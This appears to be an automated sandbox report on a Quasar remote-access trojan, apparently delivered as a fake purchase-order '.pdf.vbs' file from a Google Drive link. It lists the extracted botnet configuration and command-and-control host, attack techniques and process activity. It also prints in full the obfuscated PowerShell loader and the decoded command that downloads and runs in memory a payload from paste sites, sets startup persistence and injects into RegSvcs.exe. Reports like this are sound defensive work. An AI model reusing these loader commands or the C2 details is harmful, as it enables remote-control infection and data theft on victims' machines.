quasar | hxxps://drive[.]google[.]com/file/d/11Nff_nSTj-qAFgshL0mhor7fJP9kHxH0/view?usp=drive_web

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/11Nff_nSTj-qAFgshL0mhor7fJP9kHxH0/view?usp=drive_web

Score

10^/10

quasar aldo_r3gon execution spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pasteio.com/download/xcxWvykfm30a

Extracted

Family

quasar

Version

1.4.1

Botnet

aldo_R3GON

peurnick24.bumbleshrimp.com:7310

Mutex

77413eeb-5d1c-4bf8-986f-3c9d48a16cd6

Attributes

encryption_key
A3226D93494A561FEC5149605B952B09B55012C6
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5232-37-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar

Blocklisted process makes network request 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
194	2620	powershell.exe
201	2620	powershell.exe
205	2620	powershell.exe
260	5580	powershell.exe
261	5580	powershell.exe
262	5580	powershell.exe
263	5500	powershell.exe
264	2348	powershell.exe
265	5500	powershell.exe
266	2348	powershell.exe
267	5500	powershell.exe
268	2348	powershell.exe
269	5288	powershell.exe
270	5288	powershell.exe
271	5288	powershell.exe
272	5572	powershell.exe
273	5572	powershell.exe
274	5572	powershell.exe
276	2108	powershell.exe
277	2108	powershell.exe
278	2108	powershell.exe
279	428	powershell.exe
280	428	powershell.exe
281	428	powershell.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 20 IoCs

Web Service

T1102

Processes:

flow	ioc
175	drive.google.com
273	pastebin.com
280	pastebin.com
15	drive.google.com
114	drive.google.com
198	pastebin.com
261	pastebin.com
266	pastebin.com
270	pastebin.com
277	pastebin.com
3	drive.google.com
108	drive.google.com
113	drive.google.com
138	drive.google.com
201	pastebin.com
265	pastebin.com
4	drive.google.com
9	drive.google.com
8	drive.google.com
109	drive.google.com

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2620 set thread context of 5232	2620	powershell.exe	RegSvcs.exe
PID 5580 set thread context of 2540	5580	powershell.exe	RegSvcs.exe
PID 2348 set thread context of 5464	2348	powershell.exe	RegSvcs.exe
PID 5500 set thread context of 2040	5500	powershell.exe	RegSvcs.exe
PID 5288 set thread context of 4444	5288	powershell.exe	RegSvcs.exe
PID 5572 set thread context of 1460	5572	powershell.exe	RegSvcs.exe
PID 2108 set thread context of 5352	2108	powershell.exe	RegSvcs.exe
PID 428 set thread context of 6104	428	powershell.exe	RegSvcs.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5580	powershell.exe
5476	powershell.exe
5804	powershell.exe
2620	powershell.exe
644	powershell.exe
2108	powershell.exe
5288	powershell.exe
5572	powershell.exe
5500	powershell.exe
5304	powershell.exe
2348	powershell.exe
5564	powershell.exe
428	powershell.exe
528	powershell.exe
4864	powershell.exe
3724	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
528	powershell.exe
528	powershell.exe
528	powershell.exe
2620	powershell.exe
2620	powershell.exe
2620	powershell.exe
2620	powershell.exe
3252	powershell.exe
3252	powershell.exe
3252	powershell.exe
644	powershell.exe
644	powershell.exe
644	powershell.exe
5580	powershell.exe
5580	powershell.exe
5580	powershell.exe
4864	powershell.exe
4864	powershell.exe
4864	powershell.exe
5500	powershell.exe
5500	powershell.exe
5580	powershell.exe
5500	powershell.exe
5304	powershell.exe
5304	powershell.exe
912	powershell.exe
912	powershell.exe
5304	powershell.exe
912	powershell.exe
2348	powershell.exe
2348	powershell.exe
2348	powershell.exe
5500	powershell.exe
2148	powershell.exe
2148	powershell.exe
2148	powershell.exe
2348	powershell.exe
4080	powershell.exe
4080	powershell.exe
4080	powershell.exe
5580	powershell.exe
5580	powershell.exe
5500	powershell.exe
5500	powershell.exe
5500	powershell.exe
5500	powershell.exe
5564	powershell.exe
5564	powershell.exe
5564	powershell.exe
5288	powershell.exe
5288	powershell.exe
5288	powershell.exe
5288	powershell.exe
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe
3724	powershell.exe
3724	powershell.exe
3724	powershell.exe
5572	powershell.exe
5572	powershell.exe
5572	powershell.exe
5572	powershell.exe
3852	powershell.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exeRegSvcs.exeRegSvcs.exepowershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exepowershell.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	3252	powershell.exe
Token: SeDebugPrivilege	5232	RegSvcs.exe
Token: SeDebugPrivilege	644	powershell.exe
Token: SeDebugPrivilege	5580	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	5500	powershell.exe
Token: SeDebugPrivilege	5304	powershell.exe
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	2540	RegSvcs.exe
Token: SeDebugPrivilege	5464	RegSvcs.exe
Token: SeDebugPrivilege	2040	RegSvcs.exe
Token: SeDebugPrivilege	5564	powershell.exe
Token: SeDebugPrivilege	5288	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	4444	RegSvcs.exe
Token: SeDebugPrivilege	3724	powershell.exe
Token: SeDebugPrivilege	5572	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	1460	RegSvcs.exe
Token: SeDebugPrivilege	5476	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	5748	powershell.exe
Token: SeDebugPrivilege	5352	RegSvcs.exe
Token: SeDebugPrivilege	5804	powershell.exe
Token: SeDebugPrivilege	428	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	6104	RegSvcs.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

RegSvcs.exe

pid process

5232 RegSvcs.exe
5232 RegSvcs.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

RegSvcs.exe

pid process

5232 RegSvcs.exe
5232 RegSvcs.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegSvcs.exe

pid process

5232 RegSvcs.exe

pid	process
5232	RegSvcs.exe
5232	RegSvcs.exe

pid	process
5232	RegSvcs.exe
5232	RegSvcs.exe

pid	process
5232	RegSvcs.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exeWScript.exepowershell.exeWScript.exepowershell.exeWScript.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2388 wrote to memory of 528	2388	WScript.exe	powershell.exe
PID 2388 wrote to memory of 528	2388	WScript.exe	powershell.exe
PID 528 wrote to memory of 2620	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 2620	528	powershell.exe	powershell.exe
PID 2620 wrote to memory of 3252	2620	powershell.exe	powershell.exe
PID 2620 wrote to memory of 3252	2620	powershell.exe	powershell.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 2620 wrote to memory of 5232	2620	powershell.exe	RegSvcs.exe
PID 400 wrote to memory of 644	400	WScript.exe	powershell.exe
PID 400 wrote to memory of 644	400	WScript.exe	powershell.exe
PID 644 wrote to memory of 5580	644	powershell.exe	powershell.exe
PID 644 wrote to memory of 5580	644	powershell.exe	powershell.exe
PID 1948 wrote to memory of 4864	1948	WScript.exe	powershell.exe
PID 1948 wrote to memory of 4864	1948	WScript.exe	powershell.exe
PID 4864 wrote to memory of 5500	4864	powershell.exe	powershell.exe
PID 4864 wrote to memory of 5500	4864	powershell.exe	powershell.exe
PID 2792 wrote to memory of 5304	2792	WScript.exe	powershell.exe
PID 2792 wrote to memory of 5304	2792	WScript.exe	powershell.exe
PID 5580 wrote to memory of 912	5580	powershell.exe	powershell.exe
PID 5580 wrote to memory of 912	5580	powershell.exe	powershell.exe
PID 5304 wrote to memory of 2348	5304	powershell.exe	powershell.exe
PID 5304 wrote to memory of 2348	5304	powershell.exe	powershell.exe
PID 5500 wrote to memory of 2148	5500	powershell.exe	powershell.exe
PID 5500 wrote to memory of 2148	5500	powershell.exe	powershell.exe
PID 2348 wrote to memory of 4080	2348	powershell.exe	powershell.exe
PID 2348 wrote to memory of 4080	2348	powershell.exe	powershell.exe
PID 5580 wrote to memory of 2360	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2360	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2360	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 5580 wrote to memory of 2540	5580	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 2348 wrote to memory of 5464	2348	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 5472	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 5472	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 5472	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 5476	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 5476	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 5476	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 2040	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 2040	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 2040	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 2040	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 2040	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 2040	5500	powershell.exe	RegSvcs.exe
PID 5500 wrote to memory of 2040	5500	powershell.exe	RegSvcs.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/file/d/11Nff_nSTj-qAFgshL0mhor7fJP9kHxH0/view?usp=drive_web
1⤵
PID:4516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4260,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=3164 /prefetch:1
1⤵
PID:3540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4280,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=2468 /prefetch:1
1⤵
PID:2768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=2608,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:1
1⤵
PID:3416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5436,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
1⤵
PID:3488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5452,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:8
1⤵
PID:1268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5844,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:2
1⤵
PID:1620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5972,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:1
1⤵
PID:1360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6552,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=6120 /prefetch:1
1⤵
PID:1664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6656,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=6648 /prefetch:8
1⤵
PID:2360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6724,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:1
1⤵
PID:2112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=6580,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:8
1⤵
PID:3556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6784,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=6856 /prefetch:1
1⤵
PID:3700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7360,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=7260 /prefetch:8
1⤵
PID:3652

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3252

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=7608,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=7388 /prefetch:8
1⤵
PID:5644

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
